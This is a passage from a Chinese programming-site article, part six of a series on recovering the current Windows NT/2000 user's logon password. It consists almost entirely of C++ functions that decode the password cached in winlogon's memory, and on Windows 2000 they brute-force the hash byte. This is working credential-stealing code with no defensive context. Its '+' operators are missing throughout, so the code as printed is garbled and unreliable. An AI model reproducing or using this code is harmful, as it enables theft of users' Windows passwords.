获取WinNT/Win2k当前用户名和密码(6)
2008-02-23 05:38:12来源:互联网 阅读 ()
dwIncrement = siSystemInfo.dwPageSize;
// Move to next memory block.
i = dwIncrement;
}
CloseHandle(hWinLogonHandle);
return (FALSE);
}
//---------------------------------------------------------------------------
void ReturnWinNTPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
UNICODE_STRING usEncodedString;
usEncodedString.Length = (WORD)dwPwdLen * sizeof(wchar_t);
usEncodedString.MaximumLength =
((WORD)dwPwdLen * sizeof (wchar_t)) sizeof(wchar_t);
usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, usEncodedString.MaximumLength);
CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof(wchar_t));
// Finally - decode the password.
// Note that only one call is required since the hash-byte
// was part of the orginally encoded string.
pfnRtlRunDecodeUnicodeString((BYTE)dwHashByte, &usEncodedString);
strCurrDomain = String(wszUserDomain);
strCurrUser = String(wszUserName);
strCurrPwd = AnsiString(usEncodedString.Buffer);
// Format("您的登陆信息是 域名:%S 用户名:%S 密码:%S\n",
// ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer))));
// Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)dwHashByte))));
HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}
//---------------------------------------------------------------------------
void ReturnWin2kPwd(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
// DWORD dwHash = 0;
UNICODE_STRING usEncodedString;
usEncodedString.Length = (USHORT)dwPwdLen * sizeof(wchar_t);
usEncodedString.MaximumLength =
((USHORT)dwPwdLen * sizeof(wchar_t)) sizeof(wchar_t);
usEncodedString.Buffer = (PWSTR)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, usEncodedString.MaximumLength);
// This is a brute force technique since the hash-byte
// is not stored as part of the encoded string - :>(.
for(DWORD i=0; i<=0xff; i )
{
CopyMemory(usEncodedString.Buffer, pvPwd, dwPwdLen * sizeof (wchar_t));
// Finally - try to decode the password.
pfnRtlRunDecodeUnicodeString((BYTE)i, &usEncodedString);
// Check for a viewable password.
PBYTE pbTemp = (PBYTE)usEncodedString.Buffer;
BOOL bViewable = TRUE;
DWORD j, k;
for(j=0; (j<dwPwdLen) && bViewable; j )
{
if((*pbTemp) && (*(PBYTE)(DWORD(pbTemp) 1) == 0))
{
if(*pbTemp < 0x20)
bViewable = FALSE;
if(*pbTemp > 0x7e)
bViewable = FALSE;
}
else
bViewable = FALSE;
k = DWORD(pbTemp);
k = 2;
pbTemp = (PBYTE)k;
}
if(bViewable)
{
strCurrDomain = String(wszUserDomain);
strCurrUser = String(wszUserName);
strCurrPwd = String(usEncodedString.Buffer);
// Format("您的登陆信息为: 域名:%S 用户名:%S 密码:%S\n",
// ARRAYOFCONST((wszUserDomain, wszUserName, usEncodedString.Buffer))));
// Format("The hash byte is: 0x%2.2x.\n", ARRAYOFCONST(((int)i))));
}
}
HeapFree(GetProcessHeap(), 0, usEncodedString.Buffer);
}
//---------------------------------------------------------------------------
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇: 如何把一个网页存为一个单独的mht文档
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
